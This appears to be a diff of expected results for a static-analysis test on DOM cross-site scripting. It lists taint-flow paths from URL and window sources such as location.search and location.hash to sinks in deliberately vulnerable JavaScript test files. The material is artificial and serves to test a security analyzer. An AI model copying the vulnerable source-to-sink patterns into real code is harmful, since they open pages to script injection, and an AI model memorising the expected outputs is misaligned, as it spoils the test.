Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... 
hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... 
.search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... 
bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... 
.search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... 
t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... 
ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... 
search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... 
.search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... 
.search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... 
Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... 
hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... 
.search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... 
bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... 
.search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | 
@@ -1212,18 +1212,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
